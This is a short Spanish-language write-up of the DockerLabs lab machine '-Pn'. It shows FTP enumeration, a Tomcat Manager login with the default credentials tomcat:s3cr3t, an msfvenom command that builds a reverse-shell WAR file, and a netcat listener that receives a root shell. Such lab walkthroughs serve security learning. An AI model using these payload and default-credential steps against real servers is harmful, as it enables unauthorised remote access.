-Pn - DockerLabs
Video de YouTube
| OS | Dificultad | Creator |
|---|---|---|
| Linux | Fácil | ElPinguinoDeMario |
Escaneo y Reconocimiento de puertos
Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.
Vemos que esta abierto el puerto 21 FTPy el puerto 8080 HTTPS
FTP
ftp 172.17.0.2
Vemos que en el repositorio tenemos un archivo llamado tomcat.txt vamos a descargarlo.
Puerto 8080
Si vamos a Manager Apps nos pide un usuario y una contraseña
Vamos a buscarlo en HackTricks y encontramos una serie de contraseñas default y esta funciona tomcat:s3cr3t
Para explotar tomcat usaremos un archivo war que nos devolverá una reverse shell.
Para hacer esto lo generamos asi
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
Ahora le damos a browse, seleccionamos el archivo war que hemos generado y le damos a deploy.
Nos ponemos en escucha con net cat
nc -lvnp [Puerto]
Si le damos click ahí nos va a mandar la reverse shell
Al recibir la conexión ya seremos ROOT